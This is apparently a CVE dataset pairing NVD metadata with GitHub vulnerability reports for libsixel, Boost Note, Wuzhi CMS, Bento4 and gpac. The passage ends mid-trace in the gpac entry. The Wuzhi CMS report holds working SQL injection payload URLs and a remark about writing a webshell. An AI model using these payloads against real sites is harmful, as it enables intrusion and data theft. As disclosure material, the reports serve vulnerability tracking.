img2sixel 1.8.3 There is a heap-buffer-overflow in sixel_encode_highcolor at tosixel.c:1361 please run following cmd to reproduce it. ``` img2sixel --high-color $PoC ``` [poc](https://drive.google.com/file/d/1Hdpq1fEL_DgGeEqXyKD0YIcTOICjoGgS/view?usp=sharing) ASAN LOG ``` ==28051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6220000018fd at pc 0x7f6182c3fea8 bp 0x7ffde16993d0 sp 0x7ffde16993c8 READ of size 1 at 0x6220000018fd thread T0 #0 0x7f6182c3fea7 in sixel_encode_highcolor /home/tmp/libsixel/src/tosixel.c:1361:25 #1 0x7f6182c3fea7 in sixel_encode /home/tmp/libsixel/src/tosixel.c:1509 #2 0x7f6182f6e5a4 in sixel_encoder_output_without_macro /home/tmp/libsixel/src/encoder.c:820:14 #3 0x7f6182f6e5a4 in sixel_encoder_encode_frame /home/tmp/libsixel/src/encoder.c:1050 #4 0x7f6182d2aa21 in sixel_helper_load_image_file /home/tmp/libsixel/src/loader.c:919:14 #5 0x7f6182f66a4f in sixel_encoder_encode /home/tmp/libsixel/src/encoder.c:1737:14 #6 0x51787f in main /home/tmp/libsixel/converters/img2sixel.c:457:22 #7 0x7f61812cdb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #8 0x41a379 in _start (/home/tmp/img2sixel+0x41a379) 0x6220000018fd is located 3 bytes to the left of 5328-byte region [0x622000001900,0x622000002dd0) allocated by thread T0 here: #0 0x4da230 in __interceptor_malloc (/home/tmp/img2sixel+0x4da230) #1 0x7f6182f6e0ee in sixel_encoder_output_without_macro /home/tmp/libsixel/src/encoder.c:784:26 #2 0x7f6182f6e0ee in sixel_encoder_encode_frame /home/tmp/libsixel/src/encoder.c:1050 #3 0x7f6182d2aa21 in sixel_helper_load_image_file /home/tmp/libsixel/src/loader.c:919:14 #4 0x7f6182f66a4f in sixel_encoder_encode /home/tmp/libsixel/src/encoder.c:1737:14 #5 0x51787f in main /home/tmp/libsixel/converters/img2sixel.c:457:22 #6 0x7f61812cdb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tmp/libsixel/src/tosixel.c:1361:25 in sixel_encode_highcolor Shadow bytes around the buggy address: 0x0c447fff82c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fff82d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fff82e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fff82f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fff8300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c447fff8310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c447fff8320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fff8330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fff8340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fff8350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fff8360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==28051==ABORTING ```
heap-buffer-overflow in sixel_encode_highcolor at tosixel.c:1361
https://api.github.com/repos/saitoha/libsixel/issues/116/comments
1
2019-12-16T04:32:36Z
2019-12-18T20:32:53Z
https://github.com/saitoha/libsixel/issues/116
538,179,086
116
2,509
CVE-2021-41392
2021-09-17T22:15:08.163
static/main-preload.js in Boost Note through 0.22.0 allows remote command execution. A remote attacker may send a crafted IPC message to the exposed vulnerable ipcRenderer IPC interface, which invokes the dangerous openExternal Electron API.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BoostIO/BoostNote-App/issues/856" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/BoostIO/BoostNote-App/issues/856" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:boostnote:boostnote:*:*:*:*:*:*:*:*", "matchCriteriaId": "608C136E-55B4-49D2-A188-3A98619F4DCA", "versionEndExcluding": null, "versionEndIncluding": "0.22.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/BoostIO/BoostNote-App/issues/856
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "BoostIO", "BoostNote-App" ]
Hi, We found that `static/main-preload.js` introduces dangerous API openShellExternal for arbitrary access on unsafe renderer process. This may lead to remote command execution. We suggest that a URL check should be enforced at L15, which enforces an allowlist on trusted URLs. https://github.com/BoostIO/BoostNote.next/blob/a467dcb960531953040f26d09bd59a90c37a002e/static/main-preload.js#L14-L17
Potential Command Execution vulnerabilities introduced by main-preload.js
https://api.github.com/repos/BoostIO/BoostNote-App/issues/856/comments
2
2021-03-09T15:02:25Z
2022-06-04T18:54:59Z
https://github.com/BoostIO/BoostNote-App/issues/856
826,066,955
856
2,510
CVE-2021-40674
2021-09-20T15:15:08.990
An SQL injection vulnerability exists in Wuzhi CMS v4.1.0 via the KeyValue parameter in coreframe/app/order/admin/index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/198" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/198" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/wuzhicms/wuzhicms/issues/198
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
# There are 3 SQL injections in Wuzhicms v4.1.0 background # one ## Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability ## Vulnerability file: `/coreframe/app/pay/admin/index.php 30-98` ```php public function listing(){ $fieldtypes = array('订单号', '手机号', '所属客服', '经销商'); $keytype = isset($GLOBALS['keytype']) ? intval($GLOBALS['keytype']) : 0; $payments = $this->payments; $status_arr = $this->status_arr; $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1; $page = max($page, 1); $status = $GLOBALS['status']; if ($status) { $where = 'status=' . $status; } else { $where = 'status>0'; } if ($keytype) { $where .= " AND `keytype`='$keytype'"; } $keyValue = strip_tags($GLOBALS['keyValue']); $fieldtype = intval($GLOBALS['fieldtype']); if ($keyValue) { switch ($fieldtype) { case 0: $where .= " AND `order_no`='$keyValue'"; break; case 1: $where .= " AND `telephone`='$keyValue'"; break; case 2: $where .= " AND `kf_username`='$keyValue'"; break; case 3: $where .= " AND `jxs_username`='$keyValue'"; break; } } if ($_SESSION['role'] == 4) { //客服 $kf_username = get_cookie('username'); $where .= " AND `kf_username`='$kf_username'"; } $starttime = ''; $endtime = ''; if ($GLOBALS['starttime']) { $starttime = strtotime($GLOBALS['starttime']); $where .= " AND `addtime`>'$starttime'"; } if ($GLOBALS['endtime']) { $endtime = strtotime($GLOBALS['endtime']); $where .= " AND `endtime`<'$endtime'"; } if(isset($GLOBALS['exp'])) { $pagesize = 1000; } else { $pagesize = 20; } $admin_result = $this->db->get_list('admin', array('role' => 4), '*', 0, 20, 0); $result = $this->db->get_list('pay', $where, '*', 0, $pagesize, $page, 'id DESC'); if(isset($GLOBALS['exp'])) { $this->export_excel($result); } $pages = $this->db->pages; $total = $this->db->number; $pay_config = get_config('pay_config'); load_class('form'); include $this->template('listing'); } ``` the `$keyValue`parameter is not strictly filtered, causing `SQL` injection vulnerabilities! ## POC ``` /index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- - ``` ![image-20210906122319748](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906122319.png) ![image-20210906122347848](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906122347.png) # two The second `SQL` injection and the first `SQL` injection are in a different function in the same file! ## Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability ## Vulnerability file: `/coreframe/app/pay/admin/index.php 244-289` ```php public function relay(){ $id = intval($GLOBALS['id']); $r = $this->db->get_one('pay', array('id' => $id)); $r2 = $this->db->get_one('pay_detail', array('id' => $id)); $r = array_merge($r, $r2); $keyValue = ''; $keyType = ''; if (isset($GLOBALS['keyType'])) { $keyType = $GLOBALS['keyType']; $keyValue = $GLOBALS['keyValue']; if ($keyValue) { $where = "modelid=11 AND `$keyType` LIKE '%$keyValue%'"; $result = $this->db->get_list('member', $where, '*', 0, 20, 0, 'uid DESC'); } } elseif (isset($GLOBALS['submit'])) { load_function('common', 'pay'); $formdata = array(); $formdata['order_no'] = create_order_no(); $formdata['to_uid'] = intval($GLOBALS['to_uid']); $formdata['username'] = $r['linkman']; $formdata['mobile'] = $r['telephone']; $formdata['pinpai'] = $r['data1']; $formdata['chexing'] = $r['data3']; $formdata['addtime'] = $r['addtime']; $formdata['keytype'] = 0;//游客订单 $formdata['zftime'] = SYS_TIME; $this->db->insert('demand_relay', $formdata); $formdata2 = array(); $formdata2['op_uid'] = $_SESSION['uid']; $formdata2['to_uid'] = intval($GLOBALS['to_uid']); $formdata2['to_username'] = $GLOBALS['to_username']; $formdata2['updatetime'] = SYS_TIME; $this->db->insert('demand_history', $formdata2); // $this->db->update('demand', array('flag'=>1),array('did' => $did)); $this->db->update('pay', array('jxs_username' => $formdata2['to_username']), array('id' => $id)); $forward = strip_tags($GLOBALS['forward']); MSG('发送成功', $forward); } else { $uid = $_SESSION['uid']; $where = "op_uid='$uid'"; $data = $this->db->get_one('demand_history', $where, '*', 0, 'hid DESC'); $forward = strip_tags($GLOBALS['forward']); } include $this->template('pay_relay'); } ``` Set `$keyType=uid ` and `$keyValue` to be controllable. the `$keyValue`parameter is not strictly filtered, causing `SQL` injection vulnerabilities! ## POC ``` /index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- - ``` ![image-20210906122742954](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906122743.png) ![image-20210906123019431](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906123019.png) # three ## Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability Someone has submitted a `SQL` injection vulnerability in the file `/coreframe/app/order/admin/index.php` before (https://github.com/wuzhicms/wuzhicms/issues/175), but I found that in addition to the `$flag` parameter, it can be injected In addition, the `$keyValue` parameter can also be injected! ## Vulnerability file: `coreframe/app/order/admin/index.php 22-87` ```php public function listing() { load_class('form'); $fieldtypes = array('订单ID','标题','下单会员','物流单号'); $flag = $GLOBALS['flag']; $status = array(); $status[1] = '待发货'; $status[2] = '已发货'; $status[3] = '订单完成'; $status_arr = $this->status_arr; $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1; $page = max($page,1); $keyValue = strip_tags($GLOBALS['keyValue']); $fieldtype = intval($GLOBALS['fieldtype']); $where = '1'; if($keyValue) { switch($fieldtype) { case 0: $where .= " AND `order_no`='$keyValue'"; break; case 1: $where .= " AND `remark` LIKE '%$keyValue%'"; break; case 2: $r = $this->db->get_one('member', array('username' => $keyValue)); $uid = $r['uid']; $where .= " AND `uid`='$uid'"; break; case 3: $where .= " AND `snid`='$keyValue'"; break; } } if($flag!='' && $flag==0 || $flag) $where .=" AND `status`='$flag'"; $starttime = ''; $endtime = ''; if($GLOBALS['starttime']) { $starttime = strtotime($GLOBALS['starttime']); $where .= " AND `addtime`>'$starttime'"; } if($GLOBALS['endtime']) { $endtime = strtotime($GLOBALS['endtime']); $where .= " AND `addtime`<'$endtime'"; } $result_arr = $this->db->get_list('order_point', $where, '*', 0, 20,$page,'orderid DESC'); ``` Set `$fieldtype`=1 and `$keyValue` to be controllable. the `$keyValue`parameter is not strictly filtered, causing `SQL` injection vulnerabilities! ## POC ``` http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1 ``` ![image-20210906162438475](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906162438.png) ![image-20210906162501868](https://gitee.com/taochiyu/blogimage/raw/master/img/20210906162501.png) ``` Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0 Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file. ``` ``` https://github.com/wuzhicms/wuzhicms/issues/198 ``` ``` Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198) Use sql injection to elevate permissions and write webshell Individual ```
There are 3 SQL injections in Wuzhicms v4.1.0 background
https://api.github.com/repos/wuzhicms/wuzhicms/issues/198/comments
0
2021-09-06T13:00:49Z
2021-09-21T06:49:49Z
https://github.com/wuzhicms/wuzhicms/issues/198
989,149,160
198
2,511
CVE-2021-32265
2021-09-20T16:15:09.913
An issue was discovered in Bento4 through v1.6.0-637. A global-buffer-overflow exists in the function AP4_MemoryByteStream::WritePartial() located in Ap4ByteStream.cpp. It allows an attacker to cause code execution or information disclosure.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/545" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/545" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "9684D8EA-E280-40A0-BB75-E7AFB950B234", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-637", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/axiomatic-systems/Bento4/issues/545
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
## System info Ubuntu x86_64, clang 6.0, mp42aac (latest master [174b94](https://github.com/axiomatic-systems/Bento4/commit/174b948be29b69009b235ae0aa92884d05bcea49)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/mp4info --show-layout --show-samples --show-sample-data @@ ## AddressSanitizer output ``` ================================================================= ==47025==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000016a3561 at pc 0x0000004d9dd2 bp 0x7ffec88c7210 sp 0x7ffec88c69c0 READ of size 243 at 0x0000016a3561 thread T0 #0 0x4d9dd1 in __asan_memcpy (/home/seviezhou/bento4/build/mp4info+0x4d9dd1) #1 0x56de75 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /home/seviezhou/Bento4/Source/C++/Core/Ap4ByteStream.cpp:783:5 #2 0x5681db in AP4_ByteStream::Write(void const*, unsigned int) /home/seviezhou/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77:29 #3 0x58f7f3 in AP4_HdlrAtom::WriteFields(AP4_ByteStream&) /home/seviezhou/Bento4/Source/C++/Core/Ap4HdlrAtom.cpp:141:29 #4 0x54a666 in AP4_Atom::Write(AP4_ByteStream&) /home/seviezhou/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #5 0x54b09a in AP4_Atom::Clone() /home/seviezhou/Bento4/Source/C++/Core/Ap4Atom.cpp:316:9 #6 0x60a91b in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /home/seviezhou/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:132:41 #7 0x61a658 in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /home/seviezhou/Bento4/Source/C++/Core/Ap4SampleDescription.h:248:9 #8 0x61a658 in AP4_AudioSampleEntry::ToSampleDescription() /home/seviezhou/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:625 #9 0x63a26e in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/seviezhou/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181:53 #10 0x69f05e in AP4_AtomSampleTable::GetSampleDescription(unsigned int) /home/seviezhou/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp:207:37 #11 0x65a9cd in AP4_Track::GetSampleDescription(unsigned int) /home/seviezhou/Bento4/Source/C++/Core/Ap4Track.cpp:445:43 #12 0x51e2f4 in ShowTrackInfo_Text(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /home/seviezhou/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1239:52 #13 0x51e2f4 in ShowTrackInfo(AP4_Movie&, AP4_Track&, AP4_ByteStream&, bool, bool, bool, bool) /home/seviezhou/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1363 #14 0x51d596 in ShowTracks(AP4_Movie&, AP4_List<AP4_Track>&, AP4_ByteStream&, bool, bool, bool, bool) /home/seviezhou/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1473:9 #15 0x519316 in main /home/seviezhou/Bento4/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1755:13 #16 0x7eff145b3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #17 0x41b059 in _start (/home/seviezhou/bento4/build/mp4info+0x41b059) 0x0000016a3561 is located 63 bytes to the left of global variable 'AP4_GlobalOptions::g_Entries' defined in '/home/seviezhou/Bento4/Source/C++/Core/Ap4Utils.cpp:37:56' (0x16a35a0) of size 8 0x0000016a3561 is located 0 bytes to the right of global variable 'AP4_String::EmptyString' defined in '/home/seviezhou/Bento4/Source/C++/Core/Ap4String.cpp:39:18' (0x16a3560) of size 1 'AP4_String::EmptyString' is ascii string '' SUMMARY: AddressSanitizer: global-buffer-overflow (/home/seviezhou/bento4/build/mp4info+0x4d9dd1) in __asan_memcpy Shadow bytes around the buggy address: 0x0000802cc650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802cc660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802cc670: 00 00 00 00 00 00 00 00 00 00 00 00 04 f9 f9 f9 0x0000802cc680: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 0x0000802cc690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 =>0x0000802cc6a0: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9[01]f9 f9 f9 0x0000802cc6b0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 f9 0x0000802cc6c0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802cc6d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802cc6e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802cc6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==47025==ABORTING ``` ## POC [global-overflow-WritePartial-Ap4ByteStream-783.zip](https://github.com/axiomatic-systems/Bento4/files/5111802/global-overflow-WritePartial-Ap4ByteStream-783.zip)
A global-buffer-overflow in Ap4ByteStream.cpp:783:5
https://api.github.com/repos/axiomatic-systems/Bento4/issues/545/comments
1
2020-08-22T01:47:18Z
2022-05-01T20:31:46Z
https://github.com/axiomatic-systems/Bento4/issues/545
683,904,034
545
2,512
CVE-2021-32268
2021-09-20T16:15:09.960
Buffer overflow vulnerability in function gf_fprintf in os_file.c in gpac before 1.0.1 allows attackers to execute arbitrary code. The fixed version is 1.0.1.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/388ecce75d05e11fc8496aa4857b91245007d26e" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1587" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/388ecce75d05e11fc8496aa4857b91245007d26e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1587" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1587
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [5a884e](https://github.com/gpac/gpac/commit/5a884e376e1f67b3d40ec91c0b70ab49219fe3cd)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -disox -ttxt -2 -dump-chap-ogg -dump-cover -drtp -bt -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==66502==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000e054 at pc 0x7f91d0a841d9 bp 0x7ffcd7145d60 sp 0x7ffcd71454d8 READ of size 5 at 0x60200000e054 thread T0 #0 0x7f91d0a841d8 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x601d8) #1 0x7f91d0a84bbc in __interceptor_vfprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60bbc) #2 0x55ad61358dd0 in gf_fprintf utils/os_file.c:1512 #3 0x55ad619271c4 in url_box_dump isomedia/box_dump.c:350 #4 0x55ad61979ed0 in gf_isom_box_dump isomedia/box_funcs.c:1926 #5 0x55ad6192490a in gf_isom_box_array_dump isomedia/box_dump.c:101 #6 0x55ad6197a057 in gf_isom_box_dump_done isomedia/box_funcs.c:1933 #7 0x55ad6192d385 in dref_box_dump isomedia/box_dump.c:863 #8 0x55ad61979ed0 in gf_isom_box_dump isomedia/box_funcs.c:1926 #9 0x55ad6192490a in gf_isom_box_array_dump isomedia/box_dump.c:101 #10 0x55ad6197a057 in gf_isom_box_dump_done isomedia/box_funcs.c:1933 #11 0x55ad61927135 in dinf_box_dump isomedia/box_dump.c:339 #12 0x55ad61979ed0 in gf_isom_box_dump isomedia/box_funcs.c:1926 #13 0x55ad6192490a in gf_isom_box_array_dump isomedia/box_dump.c:101 #14 0x55ad6197a057 in gf_isom_box_dump_done isomedia/box_funcs.c:1933 #15 0x55ad61931825 in minf_box_dump isomedia/box_dump.c:1253 #16 0x55ad61979ed0 in gf_isom_box_dump isomedia/box_funcs.c:1926 #17 0x55ad6192490a in gf_isom_box_array_dump isomedia/box_dump.c:101 #18 0x55ad6197a057 in gf_isom_box_dump_done isomedia/box_funcs.c:1933 #19 0x55ad619323a5 in mdia_box_dump 